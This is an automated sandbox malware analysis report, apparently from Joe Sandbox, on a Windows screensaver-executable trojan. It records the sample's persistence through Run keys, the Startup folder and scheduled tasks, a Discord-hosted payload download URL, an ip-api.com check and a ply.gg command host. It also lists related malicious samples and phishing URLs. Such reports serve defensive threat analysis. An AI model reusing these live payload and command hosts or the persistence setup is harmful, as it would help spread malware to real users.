Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts1
Windows Management Instrumentation		1
Scheduled Task/Job		11
Process Injection		11
Masquerading		OS Credential Dumping231
Security Software Discovery		Remote Services11
Archive Collected Data		Exfiltration Over Other Network Medium11
Encrypted Channel		Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default Accounts1
Scheduled Task/Job		321
Registry Run Keys / Startup Folder		1
Scheduled Task/Job		11
Disable or Modify Tools		LSASS Memory1
Process Discovery		Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
Non-Standard Port		Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)321
Registry Run Keys / Startup Folder		41
Virtualization/Sandbox Evasion		Security Account Manager41
Virtualization/Sandbox Evasion		SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration1
Ingress Tool Transfer		Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)11
Process Injection		NTDS1
Application Window Discovery		Distributed Component Object ModelInput CaptureScheduled Transfer2
Non-Application Layer Protocol		SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
Deobfuscate/Decode Files or Information		LSA Secrets1
System Network Configuration Discovery		SSHKeyloggingData Transfer Size Limits3
Application Layer Protocol		Manipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.common2
Obfuscated Files or Information		Cached Domain Credentials2
File and Directory Discovery		VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup Items11
Software Packing		DCSync22
System Information Discovery		Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1331098 Sample: #U043f#U0440#U043e#U0432#U0... Startdate: 24/10/2023 Architecture: WINDOWS Score: 100 39 ip-api.com 2->39 41 ideas-teams.at.ply.gg 2->41 43 cdn.discordapp.com 2->43 51 Multi AV Scanner detection for domain / URL 2->51 53 Multi AV Scanner detection for dropped file 2->53 55 .NET source code contains potential unpacker 2->55 57 3 other signatures 2->57 9 #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe 17 9 2->9         started        14 fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr 1 2->14         started        16 fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr 2->16         started        18 fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr 2->18         started        signatures3 process4 dnsIp5 49 cdn.discordapp.com 162.159.135.233, 443, 49713, 49714 CLOUDFLARENETUS United States 9->49 35 C:\Users\user\AppData\Roaming\...\wininit.scr, PE32 9->35 dropped 37 fMSltjPKLJOyGNdEEU...QFZQHUfONBBckwZ.scr, PE32 9->37 dropped 67 Creates autostart registry keys with suspicious values (likely registry only malware) 9->67 69 Creates multiple autostart registry keys 9->69 71 Drops PE files with a suspicious file extension 9->71 75 2 other signatures 9->75 20 fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr 15 7 9->20         started        25 WerFault.exe 22 16 9->25         started        73 Multi AV Scanner detection for dropped file 14->73 file6 signatures7 process8 dnsIp9 45 ip-api.com 208.95.112.1, 49715, 80 TUT-ASUS United States 20->45 47 ideas-teams.at.ply.gg 209.25.140.229, 54323 COGECO-PEER1CA Canada 20->47 31 fMSltjPKLJOyGNdEEU...QFZQHUfONBBckwZ.scr, PE32 20->31 dropped 33 fMSltjPKLJOyGNdEEU...QFZQHUfONBBckwZ.scr, PE32 20->33 dropped 59 Multi AV Scanner detection for dropped file 20->59 61 Machine Learning detection for dropped file 20->61 63 Creates autostart registry keys with suspicious values (likely registry only malware) 20->63 65 5 other signatures 20->65 27 schtasks.exe 1 20->27         started        file10 signatures11 process12 process13 29 conhost.exe 27->29         started       

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe100%Joe Sandbox ML

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scr100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr91%ReversingLabsByteCode-MSIL.Trojan.Nekark
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr51%VirustotalBrowse
C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr91%ReversingLabsByteCode-MSIL.Trojan.Nekark
C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr51%VirustotalBrowse
C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0\wininit.scr39%ReversingLabsWin32.Trojan.Mardom
C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr91%ReversingLabsByteCode-MSIL.Trojan.Nekark
C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr51%VirustotalBrowse

Unpacked PE Files

No Antivirus matches

Domains

SourceDetectionScannerLabelLink
ideas-teams.at.ply.gg8%VirustotalBrowse

URLs

SourceDetectionScannerLabelLink
http://www.whatsmyip.us/showipsimple.php0%Avira URL Cloudsafe
http://www.whatsmyip.us/showipsimple.php3%VirustotalBrowse

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
cdn.discordapp.com
162.159.135.233
truefalse
    		high
    ip-api.com
    		208.95.112.1
    		truefalse
      		high
      ideas-teams.at.ply.gg
      		209.25.140.229
      		truefalseunknown

      Contacted URLs

      NameMaliciousAntivirus DetectionReputation
      https://cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exefalse
        		high
        http://cdn.discordapp.com/attachments/1161633037004587060/1161731056462995496/lient.exefalse
          		high
          http://ip-api.com/line/?fields=hostingfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            http://upx.sf.netAmcache.hve.13.drfalse
              		high
              http://www.whatsmyip.us/showipsimple.php#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, wininit.scr.0.drfalse
              • 3%, Virustotal, Browse
              • Avira URL Cloud: safe
              		unknown
              https://cdn.discordapp.com#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2721666334.0000000002F32000.00000004.00000800.00020000.00000000.sdmpfalse
                		high
                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2721666334.0000000002EF1000.00000004.00000800.00020000.00000000.sdmp, fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.0000000002761000.00000004.00000800.00020000.00000000.sdmpfalse
                  		high
                  http://cdn.discordapp.com#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe, 00000000.00000002.2721666334.0000000002EF1000.00000004.00000800.00020000.00000000.sdmpfalse
                    		high
                    http://ip-api.comfMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.00000000027D9000.00000004.00000800.00020000.00000000.sdmp, fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, 00000002.00000002.3239287368.0000000002819000.00000004.00000800.00020000.00000000.sdmpfalse
                      		high

                      World Map of Contacted IPs

                      • No. of IPs < 25%
                      • 25% < No. of IPs < 50%
                      • 50% < No. of IPs < 75%
                      • 75% < No. of IPs

                      Public IPs

                      IPDomainCountryFlagASNASN NameMalicious
                      208.95.112.1
                      		ip-api.comUnited States
                      		53334TUT-ASUSfalse
                      209.25.140.229
                      		ideas-teams.at.ply.ggCanada
                      		13768COGECO-PEER1CAfalse
                      162.159.135.233
                      		cdn.discordapp.comUnited States
                      		13335CLOUDFLARENETUSfalse

                      General Information

                      Joe Sandbox Version:38.0.0 Ammolite
                      Analysis ID:1331098
                      Start date and time:2023-10-24 09:28:06 +02:00
                      Joe Sandbox Product:CloudBasic
                      Overall analysis duration:0h 6m 27s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                      Number of analysed new started processes analysed:14
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample file name:#U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe
                      renamed because original name is a hash value
                      Original Sample Name:_.scr.exe
                      Detection:MAL
                      Classification:mal100.adwa.evad.winEXE@10/11@3/3
                      EGA Information:
                      • Successful, ratio: 40%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 80
                      • Number of non-executed functions: 23
                      Cookbook Comments:
                      • Found application associated with file extension: .exe

                      Warnings

                      • Exclude process from analysis (whitelisted): dllhost.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                      • Excluded IPs from analysis (whitelisted): 20.189.173.20
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
                      • Execution Graph export aborted for target fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, PID 7504 because it is empty
                      • Execution Graph export aborted for target fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, PID 7716 because it is empty
                      • Execution Graph export aborted for target fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr, PID 7776 because it is empty
                      • Not all processes where analyzed, report is missing behavior information
                      • Report size exceeded maximum capacity and may have missing behavior information.
                      • Report size getting too big, too many NtOpenFile calls found.
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                      • Report size getting too big, too many NtQueryAttributesFile calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                      • Report size getting too big, too many NtSetInformationFile calls found.

                      Simulations

                      Behavior and APIs

                      TimeTypeDescription
                      09:28:51API Interceptor95930x Sleep call for process: #U043f#U0440#U043e#U0432#U0435#U0440#U0430_#U0431#U043b#U043e#U043a#U043d#U043e#U0442#U0430.scr.exe modified
                      09:28:52AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Stata C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0wininit.scr
                      09:28:55Task SchedulerRun new task: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ path: C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      09:28:55API Interceptor1x Sleep call for process: fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr modified
                      09:29:00AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      09:29:10AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Stata C:\Users\user\AppData\Roaming\RHmhiglWQXBcNdhjbBdI\socxnesDllYLlIVjQiUY\1.0.0.0wininit.scr
                      09:29:18AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ C:\Users\user\AppData\Roaming\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      09:29:26AutostartRun: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fMSltjPKLJOyGNdEEUKMEdGkiQFZQHUfONBBckwZ.scr
                      09:30:05API Interceptor1x Sleep call for process: WerFault.exe modified

                      Joe Sandbox View / Context

                      IPs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      208.95.112.1Quotation.jsGet hashmaliciousWSHRATBrowse
                      • ip-api.com/json/
                      Tax-Returns-Of-R58-765.jsGet hashmaliciousWSHRATBrowse
                      • ip-api.com/json/
                      DRMS_Tender_No._P500-2023-102.exeGet hashmaliciousPredatorBrowse
                      • ip-api.com/json/
                      vZFGXiTg6o.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                      • ip-api.com/line/?fields=hosting
                      SecuriteInfo.com.BackDoor.Quasar.1.1234.11747.exeGet hashmaliciousBlackshadesBrowse
                      • ip-api.com/json/
                      xeC7cROikxmJ.exeGet hashmaliciousQuasarBrowse
                      • ip-api.com/json/
                      Ref-231017AF-Payment-Details.jsGet hashmaliciousAgentTesla, WSHRATBrowse
                      • ip-api.com/json/
                      New_DHL_Shipment_Document_Arrival_Notice_Shipping_Documents_Original_BL,_Invoice_&_Packing_List.jsGet hashmaliciousWSHRat, VjW0rmBrowse
                      • ip-api.com/json/
                      WXzp6KMJ7i.exeGet hashmaliciousDCRat, Raccoon Stealer v2, RedLineBrowse
                      • ip-api.com/line/?fields=hosting
                      Payment_Copy.docx.vbsGet hashmaliciousAgentTesla, WSHRATBrowse
                      • ip-api.com/json/
                      RYwCwF604X.vbsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                      • ip-api.com/line/?fields=hosting
                      1697173443391df00c7408a96b6f171c3665fb615c66daa3825087c6632b5d286d07b6b591233.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                      • ip-api.com/line/?fields=hosting
                      W7z1Z5tra2.exeGet hashmaliciousRedLine, WSHRATBrowse
                      • ip-api.com/json/
                      J1LICQ1PqV.exeGet hashmaliciousUnknownBrowse
                      • ip-api.com/line/?fields=hosting
                      Fekubiv.exeGet hashmaliciousPhemedrone StealerBrowse
                      • ip-api.com/json/?fields=11827
                      Fekubiv.exeGet hashmaliciousPhemedrone StealerBrowse
                      • ip-api.com/json/?fields=11827
                      2Elynyru.exeGet hashmaliciousPhemedrone StealerBrowse
                      • ip-api.com/json/?fields=11827
                      16970164832f46ccf1ed8cbfb3a428dcf1a37a26fdb5f110b9d4713c4435d7b67ec0a18b61185.dat-decoded.exeGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                      • ip-api.com/line/?fields=hosting
                      sample.exeGet hashmaliciousXWormBrowse
                      • ip-api.com/line/?fields=hosting
                      file.exeGet hashmaliciousUnknownBrowse
                      • ip-api.com/line/?fields=hosting

                      Domains

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      ip-api.comf557585868686689ax.htmGet hashmaliciousUnknownBrowse
                      • 208.95.112.2
                      Quotation.jsGet hashmaliciousWSHRATBrowse
                      • 208.95.112.1
                      Tax-Returns-Of-R58-765.jsGet hashmaliciousWSHRATBrowse
                      • 208.95.112.1
                      DRMS_Tender_No._P500-2023-102.exeGet hashmaliciousPredatorBrowse
                      • 208.95.112.1
                      vZFGXiTg6o.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                      • 208.95.112.1
                      nej4vdHX1w.exeGet hashmaliciousAmadey, Glupteba, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoaderBrowse
                      • 208.95.112.1
                      SecuriteInfo.com.BackDoor.Quasar.1.1234.11747.exeGet hashmaliciousBlackshadesBrowse
                      • 208.95.112.1
                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoaderBrowse
                      • 208.95.112.1
                      TSiDou7y4f.exeGet hashmaliciousAmadey, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoaderBrowse
                      • 208.95.112.1
                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoader, XmrigBrowse
                      • 208.95.112.1
                      file.exeGet hashmaliciousAmadey, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoader, XmrigBrowse
                      • 208.95.112.1
                      pdf-92837.xlsxGet hashmaliciousUnknownBrowse
                      • 208.95.112.2
                      xeC7cROikxmJ.exeGet hashmaliciousQuasarBrowse
                      • 208.95.112.1
                      Ref-231017AF-Payment-Details.jsGet hashmaliciousAgentTesla, WSHRATBrowse
                      • 208.95.112.1
                      https://app.donorview.com/Communication/Click?prm=uEvQjbLyROfQy1XICroxZgnn6zkK-jxszv3c-V7QVTzbyWCRnwEo72rfjdFLOn6LD-AbzGoObSWvJEDMZH3l_sAl_z1NUhFuXl1zt3juOmIcN_J3w3rrSbzKkTErDNu48wmAjuOwMWYFji5HSlNfrNvlQzfcdYndFW3XpMVPR1ahJlmQEYNAysRt4-YWnhMQPXKbA4Diq5MECXxH0hT8_be4LADzMz-s1ZJP8a9qn301&target=https://calm-snowflake-5721.on.fleek.co/#lauren.walsh@ifcfilms.com%20https://app.donorview.com/Communication/Click?prm=uEvQjbLyROfQy1XICroxZgnn6zkK-jxszv3c-V7QVTzbyWCRnwEo72rfjdFLOn6LD-AbzGoObSWvJEDMZH3l_sAl_z1NUhFuXl1zt3juOmIcN_J3w3rrSbzKkTErDNu48wmAjuOwMWYFji5HSlNfrNvlQzfcdYndFW3XpMVPR1ahJlmQEYNAysRt4-YWnhMQPXKbA4Diq5MECXxH0hT8_be4LADzMz-s1ZJP8a9qn301&target=https://calm-snowflake-5721.on.fleek.co/#lauren.walsh@ifcfilms.comGet hashmaliciousHTMLPhisherBrowse
                      • 208.95.112.2
                      New_DHL_Shipment_Document_Arrival_Notice_Shipping_Documents_Original_BL,_Invoice_&_Packing_List.jsGet hashmaliciousWSHRat, VjW0rmBrowse
                      • 208.95.112.1
                      WXzp6KMJ7i.exeGet hashmaliciousDCRat, Raccoon Stealer v2, RedLineBrowse
                      • 208.95.112.1
                      Payment_Copy.docx.vbsGet hashmaliciousAgentTesla, WSHRATBrowse
                      • 208.95.112.1
                      message.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 208.95.112.2
                      Gsk-Lux.htmlGet hashmaliciousHTMLPhisherBrowse
                      • 208.95.112.2
                      cdn.discordapp.comXJFQnTn3QU.exeGet hashmaliciousUnknownBrowse
                      • 162.159.135.233
                      y4TF9DptOh.exeGet hashmaliciousUnknownBrowse
                      • 162.159.129.233
                      XJFQnTn3QU.exeGet hashmaliciousUnknownBrowse
                      • 162.159.133.233
                      y4TF9DptOh.exeGet hashmaliciousUnknownBrowse
                      • 162.159.133.233
                      Draft_BL,_CI_&_PL.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                      • 162.159.135.233
                      file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, RedLine, SmokeLoaderBrowse
                      • 162.159.129.233
                      file.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, Glupteba, LummaC Stealer, RedLine, SmokeLoaderBrowse
                      • 162.159.135.233
                      file.exeGet hashmaliciousRedLine, XmrigBrowse
                      • 162.159.133.233
                      file.exeGet hashmaliciousRedLine, XmrigBrowse
                      • 162.159.135.233
                      RFQ_____20.10.2023___jpeg_image.exeGet hashmaliciousUnknownBrowse
                      • 162.159.130.233
                      RFQ_____20.10.2023___jpeg_image.exeGet hashmaliciousUnknownBrowse
                      • 162.159.135.233
                      doc_253554_2023.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 162.159.130.233
                      out.jsGet hashmaliciousUnknownBrowse
                      • 162.159.134.233
                      out.jsGet hashmaliciousUnknownBrowse
                      • 162.159.133.233
                      RFQ-No._10-18-2023.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                      • 162.159.135.233
                      shippingdocument.vbsGet hashmaliciousGuLoader, RemcosBrowse
                      • 162.159.129.233
                      http://predimed.crm360.ptGet hashmaliciousUnknownBrowse
                      • 162.159.134.233
                      PO.htaGet hashmaliciousAgentTeslaBrowse
                      • 162.159.135.233
                      file.exeGet hashmaliciousAmadey, Babuk, Clipboard Hijacker, CobaltStrike, Djvu, Glupteba, RedLineBrowse
                      • 162.159.130.233
                      invoice.vbsGet hashmaliciousRemcos, GuLoaderBrowse
                      • 162.159.133.233

                      ASNs

                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                      CLOUDFLARENETUShttps://gtzenterprises.com.np/inag/?67368931Get hashmaliciousUnknownBrowse
                      • 162.159.135.42
                      UNILEVER_PURCHASE_ORDER_#109332.xlsGet hashmaliciousAgentTesla, zgRATBrowse
                      • 104.21.83.102
                      BLM_Inqury_PO009116420231024.xlsGet hashmaliciousAgentTesla, zgRATBrowse
                      • 172.67.222.26
                      http://www.alsumooduae.comGet hashmaliciousUnknownBrowse
                      • 104.17.25.14
                      file.exeGet hashmaliciousAmadey, Babadeda, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoaderBrowse
                      • 1.1.1.1
                      Sheet_2.A.docGet hashmaliciousAgentTeslaBrowse
                      • 172.67.166.168
                      P.O_2.docGet hashmaliciousFormBookBrowse
                      • 172.67.132.61
                      PURCHASE_O_001.docGet hashmaliciousFormBookBrowse
                      • 104.21.4.159
                      Suntech_Inquiry_P43030.xlsGet hashmaliciousFormBookBrowse
                      • 104.21.88.28
                      Doc002355.xlsGet hashmaliciousAgentTesla, zgRATBrowse
                      • 172.67.222.26
                      Bhl9bymdkI.exeGet hashmaliciousFormBookBrowse
                      • 172.67.213.32
                      47rR4jIgtD.exeGet hashmaliciousRaccoon Stealer v2, zgRATBrowse
                      • 172.67.130.17
                      hwASvuKtNVNBQwu.exeGet hashmaliciousAgentTeslaBrowse
                      • 162.159.137.232
                      GCeHcfCef8.exeGet hashmaliciousFormBookBrowse
                      • 104.19.157.23
                      New_Order_enquiry.xla.xlsxGet hashmaliciousAgentTesla, zgRATBrowse
                      • 172.67.215.45
                      Purchase_Order_022502_-_0002.xla.xlsxGet hashmaliciousAgentTesla, zgRATBrowse
                      • 104.21.45.138
                      file.exeGet hashmaliciousDjvu, Glupteba, RedLine, SmokeLoader, XmrigBrowse
                      • 172.67.139.220
                      REF_03351.docGet hashmaliciousFormBookBrowse
                      • 104.21.53.135
                      Purchase_Order_A7.pdf.exeGet hashmaliciousFormBookBrowse
                      • 172.64.151.154
                      file.exeGet hashmaliciousFormBookBrowse
                      • 23.227.38.74
                      COGECO-PEER1CAPurchase_Order_A7.pdf.exeGet hashmaliciousFormBookBrowse
                      • 162.254.39.20
                      https://%C4%BEa.eu/5UUGet hashmaliciousUnknownBrowse
                      • 69.90.254.78
                      https://open.substack.com/pub/davidlebovitz/p/brittany-addresses?r=aq9on&utm_medium=ios&utm_campaign=postGet hashmaliciousHTMLPhisherBrowse
                      • 69.90.254.78
                      https://www.google.com/url?sa=t&source=web&rct=j&opi=89978449&url=https://www.generation-nt.com/reponses/on-gnome-xfce-kde-bientot-nous-aurons-windows-entraide-3844211.html%3Fpage%3D2&ved=2ahUKEwin4OyqhYyCAxXzlWoFHdflDIsQFnoECAgQAQ&usg=AOvVaw0aU9VdyHXl9jH_yb4I9bI0Get hashmaliciousUnknownBrowse
                      • 69.90.254.78
                      5taQFPMw1K.elfGet hashmaliciousMiraiBrowse
                      • 208.239.240.239
                      x607DB0i08.exeGet hashmaliciousPushdoBrowse
                      • 76.74.184.61
                      http://4576cjdgaj786eugtdeuatda.z6.web.core.windows.netGet hashmaliciousUnknownBrowse
                      • 69.90.133.51
                      https://www.canva.com/design/DAFxlvBGr-o/diWl6nVbhBiveMVSeuUDpQ/view?utm_content=DAFxlvBGr-o&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousHTMLPhisherBrowse
                      • 103.26.141.105
                      sora.arm7.elfGet hashmaliciousMiraiBrowse
                      • 66.129.182.32
                      x86.elfGet hashmaliciousMiraiBrowse
                      • 66.40.223.193
                      x86-20231015-1817.elfGet hashmaliciousMiraiBrowse
                      • 216.65.83.162
                      https://8o88sfjx.page.link/29hQGet hashmaliciousUnknownBrowse
                      • 209.25.233.253
                      https://www.erhealthplans.com/RKduHZzY/d?url=pblfmwjrj3kxjoWIqcHUd0IhrjmdDp9PHmkGgoqwR3GqcWGZHZ#pblfmwjrj3kxjoWIqcHUd0IhrjmdDp9PHmkGgoqwR3GqcWGZHZMAYYY2hyaXN0aWUuYmFlejFAc3NzcHIuY29tGet hashmaliciousUnknownBrowse
                      • 209.25.233.254
                      x7RlIzQDk1.exeGet hashmaliciousUnknownBrowse
                      • 76.74.184.61
                      https://syswc3ar.page.link/jofZGet hashmaliciousHTMLPhisherBrowse
                      • 209.25.233.254
                      http://iplogger.comGet hashmaliciousHTMLPhisherBrowse
                      • 209.25.233.254
                      https://rosmodem.wordpress.comGet hashmaliciousHTMLPhisherBrowse
                      • 209.25.233.254
                      SecureMessage99331.htMGet hashmaliciousHTMLPhisherBrowse
                      • 69.90.66.130
                      EwK95WVtzI.exeGet hashmaliciousPushdoBrowse
                      • 76.74.184.61
                      https://p.feedblitz.com/t3/882921/109614235/13473938/https://viewfromthewing.com/airbnb-guest-stayed-500-nights-and-demanded-100000-to-leave-because-california/Get hashmaliciousUnknownBrowse
                      • 69.90.133.51
                      TUT-ASUSf557585868686689ax.htmGet hashmaliciousUnknownBrowse
                      • 208.95.112.2
                      Quotation.jsGet hashmaliciousWSHRATBrowse
                      • 208.95.112.1
                      Tax-Returns-Of-R58-765.jsGet hashmaliciousWSHRATBrowse
                      • 208.95.112.1
                      DRMS_Tender_No._P500-2023-102.exeGet hashmaliciousPredatorBrowse
                      • 208.95.112.1
                      vZFGXiTg6o.exeGet hashmaliciousAsyncRAT, StormKitty, VenomRATBrowse
                      • 208.95.112.1
                      SecuriteInfo.com.BackDoor.Quasar.1.1234.11747.exeGet hashmaliciousBlackshadesBrowse
                      • 208.95.112.1
                      pdf-92837.xlsxGet hashmaliciousUnknownBrowse
                      • 208.95.112.2
                      pdf-92837.xlsxGet hashmaliciousUnknownBrowse
                      • 208.95.112.2
                      xeC7cROikxmJ.exeGet hashmaliciousQuasarBrowse
                      • 208.95.112.1
                      Ref-231017AF-Payment-Details.jsGet hashmaliciousAgentTesla, WSHRATBrowse
                      • 208.95.112.1
